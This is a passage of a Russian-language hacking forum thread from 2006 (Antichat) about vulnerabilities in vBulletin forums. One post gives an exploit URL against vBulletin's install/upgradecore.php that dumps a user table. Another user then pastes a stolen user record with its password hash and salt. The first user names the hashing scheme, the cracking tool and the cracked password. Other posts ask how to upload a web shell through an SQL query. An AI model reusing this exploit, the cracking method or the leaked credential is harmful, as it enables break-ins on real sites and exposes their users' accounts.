ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 19.11.2006, 19:13
CtHuLhU
Новичок
Регистрация: 12.11.2006
Сообщений: 9
Провел на форуме:
95494

Репутация: 2
По умолчанию

for KruGoZor

всё так. и от скрипта не зависит.
как сплойт проще заюзать
/install/upgradecore.php?do=sqltable&table=user&step[]
где user - предполагаемое имя таблицы с хэшами юзверей

Последний раз редактировалось CtHuLhU; 19.11.2006 в 19:17..
 
Ответить с цитированием

  #42  
Старый 19.11.2006, 19:56
KruGoZor
Новичок
Регистрация: 15.10.2006
Сообщений: 9
Провел на форуме:
16460

Репутация: 1
По умолчанию

круто спасибо!!!
с меня +))
 
Ответить с цитированием

  #43  
Старый 19.11.2006, 20:11
KruGoZor
Новичок
Регистрация: 15.10.2006
Сообщений: 9
Провел на форуме:
16460

Репутация: 1
По умолчанию

INSERT INTO user VALUES('1','6','','0','LORD ALUCARD','a7e65433b82e964d3c0c0719115b63f8','2006-07-23','','0','','','','','','','','2','1','Древ ее Зло','1','1153657920','0','1163931713','1163949 280','1163931841','40','10','5','3','0','0','0','0 ','2135','07-14-1988','1988-07-14','-1','1','','0','0','0','0','-1','21','0','sab');


плииз поможите ещё сгенерить пароль...или скажите как по шагам)))
где соль я тоже не могу найти (sab чтоли??)
 
Ответить с цитированием

  #44  
Старый 20.11.2006, 21:22
CtHuLhU
Новичок
Регистрация: 12.11.2006
Сообщений: 9
Провел на форуме:
95494

Репутация: 2
По умолчанию

хэш: a7e65433b82e964d3c0c0719115b63f8
соль: sab
метод шифрования: md5(md5($pass).$salt) [PHP]

пароль: 253839
=)))

юзал PasswordPro 2.2.1.2
 
Ответить с цитированием

  #45  
Старый 21.11.2006, 21:22
И.Г.
Постоянный
Регистрация: 29.08.2006
Сообщений: 752
Провел на форуме:
2051507

Репутация: 1178


Отправить сообщение для И.Г. с помощью ICQ
По умолчанию

Что то никто ничего толком не предложил... Exploit наверно нет... XSS я думаю все нашли... но это гимморойно....
 
Ответить с цитированием

  #46  
Старый 22.11.2006, 08:48
Mr_Necromancer
Новичок
Регистрация: 21.11.2006
Сообщений: 29
Провел на форуме:
90591

Репутация: 33
По умолчанию

Хэш брутить мона прогой PasswordPro, но если пароль не дико простой, то на это у тебя уйдёт пару десятков лет
 
Ответить с цитированием

  #47  
Старый 22.11.2006, 14:40
cardons
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159

Репутация: 950


По умолчанию

А кто нибудь знает как заливать шел,через Sql запрос?
 
Ответить с цитированием

  #48  
Старый 22.11.2006, 21:31
И.Г.
Постоянный
Регистрация: 29.08.2006
Сообщений: 752
Провел на форуме:
2051507

Репутация: 1178


Отправить сообщение для И.Г. с помощью ICQ
По умолчанию

Цитата:
А кто нибудь знает как заливать шел,через Sql запрос?
чуть конкретней....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
vBulletin v 3.5.4 rus Alex_000 PHP, PERL, MySQL, JavaScript 0 03.07.2006 11:55
Спереть куки в vBulletin 3.5.4 GoRiLLa Форумы 2 16.06.2006 12:50
Раскрытие пути в vBulletin 3.5.4 Qwazar Форумы 3 06.05.2006 15:08
Подскажите по vBulletin seeattact Болталка 3 21.02.2006 00:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ